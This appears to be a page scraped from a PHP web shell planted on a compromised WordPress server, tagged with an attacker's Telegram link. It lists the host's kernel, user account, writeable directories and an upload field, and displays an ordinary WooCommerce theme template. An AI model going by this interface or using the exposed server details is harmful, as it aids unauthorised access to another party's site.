https://t.me/AnonymousX5
Server : Apache
System : Linux ls31.server.ly 3.10.0-962.3.2.lve1.5.68.el7.x86_64 #1 SMP Wed Apr 6 11:12:23 UTC 2022 x86_64
User : medchoco ( 2906)
PHP Version : 8.3.16
Disable Function : mail
Directory :  /home/medchoco/www/wp-content/themes/puca/woocommerce/item-product/themes/fashion2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/medchoco/www/wp-content/themes/puca/woocommerce/item-product/themes/fashion2/special.php
<?php 
global $product,$woocommerce_loop;

if( !isset($columns) ) {
	$columns = 4;
} 

// Extra post classes 
$classes = array();

if(isset($columns)) {
	$woocommerce_loop['columns'] = $columns;

	if($woocommerce_loop['columns'] == 5) {
		$largedesktop = '2-4';
	}else {
		$largedesktop = 12/$woocommerce_loop['columns'];
	}

	if( isset($screen_desktop) &&  $screen_desktop == 5) {
		$desktop = '2-4';
	} elseif( isset($screen_desktop) ) {
		$desktop = 12/$screen_desktop;
	}

	if( isset($screen_desktopsmall) &&  $screen_desktopsmall == 5) {
		$desktopsmall = '2-4';
	} elseif( isset($screen_desktopsmall) ) {
		$desktopsmall = 12/$screen_desktopsmall;
	}

	if( isset($screen_tablet) &&  $screen_tablet == 5) {
		$tablet = '2-4';
	} elseif( isset($screen_tablet) ) {
		$tablet = 12/$screen_tablet;
	}

	if( isset($screen_mobile) &&  $screen_mobile == 5) {
		$mobile = '2-4';
	} elseif( isset($screen_mobile) ) {
		$mobile = 12/$screen_mobile;
	}

	$classes[] 		= 'col-xlg-'.$largedesktop.' col-lg-'.$desktop.' col-xs-'. $mobile .' col-md-'.$desktopsmall.' col-sm-'.$tablet;
}

?>
<div <?php post_class( $classes ); ?> >
	<div class="product-block product-special product">
		<div class="row">
			<div class="block-inner">
				<figure class="image">
					<a title="<?php the_title_attribute(); ?>" href="<?php echo the_permalink(); ?>" class="product-image">
						<?php
							/**
							* woocommerce_before_shop_loop_item_title hook
							*
							* @hooked woocommerce_show_product_loop_sale_flash - 10
							* @hooked woocommerce_template_loop_product_thumbnail - 10
							*/
							remove_action('woocommerce_before_shop_loop_item_title','woocommerce_show_product_loop_sale_flash', 10);
							do_action( 'woocommerce_before_shop_loop_item_title' );
						?>
					</a>
					<?php 
						do_action( 'woocommerce_before_shop_loop_item_title_2' );
					?>
					<div class="button-wishlist">
						<?php
							$enabled_on_loop = 'yes' == get_option( 'yith_wcwl_show_on_loop', 'no' );
								if( class_exists( 'YITH_WCWL' ) || $enabled_on_loop ) {
								echo do_shortcode( '[yith_wcwl_add_to_wishlist]' );
							}
						?>  
					</div>

					
				</figure>
			</div>
			<div class="caption">
				<div class="meta">
					<div class="infor">
						<?php woocommerce_show_product_loop_sale_flash(); ?>
						<h3 class="name"><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h3>
						<?php
							/**
							* woocommerce_after_shop_loop_item_title hook
							*
							* @hooked woocommerce_template_loop_rating - 5
							* @hooked woocommerce_template_loop_price - 10
							*/
							do_action( 'woocommerce_after_shop_loop_item_title');

						?>
					</div>
				</div>
				<div class="groups-button clearfix">
					<?php do_action( 'woocommerce_after_shop_loop_item' ); ?>
				</div>							
			</div>    
	    </div>
	</div>	
</div>	

https://t.me/AnonymousX5 - 2025